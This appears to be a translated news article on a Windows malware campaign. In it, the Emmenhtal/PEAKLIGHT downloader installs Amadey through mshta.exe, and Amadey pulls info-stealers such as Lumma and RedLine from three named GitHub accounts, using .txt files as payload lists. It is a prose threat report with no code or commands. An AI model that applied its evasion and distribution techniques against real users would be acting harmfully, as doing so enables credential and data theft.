A stealth attack campaign is taking place targeting Windows users, using Amadey malware as a transit point to install more data – stealing malware. The attacker has taken advantage of public repositories on GitHub as a payload dispersal station, thus overcoming most traditional web filters. The incident again sounded the alarm that legitimate platforms could be turned into malware pimps.

The campaign began by installing a malicious code downloader called Emmenhtal, also known as PEAKLIGHT. The code is written in the AutoIt language, commonly used in automation tools, allowing easy camouflage as harmless software. Emmenhtal is packaged with a custom DLL library to perform hidden acts, including process monitoring, hiding network activity, and slowing down technical analysis. Once executed, Emmenhtal establishes a connection to the remote server, downloads Amadey malicious code, and activates it via the Windows utility mshta.exe. This is a technique commonly used by attack groups to avoid detection by security software because of taking advantage of legal components available in the operating system rather than calling directly unusual behavior.

Amadey acts as a specialized middleware platform, serving as a miniaturized operating system dedicated to malicious code. When implemented into the system, Amadey does not perform complex attack behaviors on its own but instead supports loading and managing custom plugins. These plugins perform each specific task such as stealing login information from the browser, extracting data from email software, accessing FTP and VPN, or capturing the user’s screen in real time. During the campaign, Amadey was programmed to connect to public repositories on GitHub to download additional malicious components. Rather than using a traditional, easily identifiable C2 infrastructure, the attack team leveraged GitHub as a malicious code distribution server with the advantage of outrunning most of the network content filtering policies due to the platform’s reputation and inherent reliability in corporate environments.

The campaign uses three publicly available GitHub accounts, Legendary99909, DFfe9ewf and Milidmdds, to store and distribute malicious code. These repositories contain a variety of.exe executable files,.dll libraries, and PowerShell scripts, which serve either as extensions to Amadey or are used as standalone payloads. Notably, many of these files contained already reputable thieves on the black market such as Lumma Stealer, RedLine Stealer and Rhadamanthys. These are all malicious codes specifically designed to steal browser information, login cookies, cryptocurrency data, and many other sensitive user information. The integration of such powerful stealing tools greatly expands the range of exploitation and the value of each victim controlled machine.

A delicate point in the campaign was the use of.txt text files on GitHub as remote control panels in rudimentary form. Each file contains a list of URLs leading to the actual payloads, allowing the attacker to easily update the download sequence without editing the Amadey code installed on the victim’s machine. This approach helps the attack team maintain flexibility in coordinating the campaign, while masking the real purpose by using a simple text format. It is this camouflage that makes it more difficult to detect malicious behavior, while the latency on command generation and distribution of malicious code is kept to a minimum.

The campaign showed the level of danger when malicious code was distributed through legitimate platforms such as GitHub, which were inherently secure by default. Concealing payloads in public archives makes it easier for attackers to overcome traditional layers of defense. This is a strong reminder that users and organizations alike should be more wary of any download, even from a seemingly trustworthy source.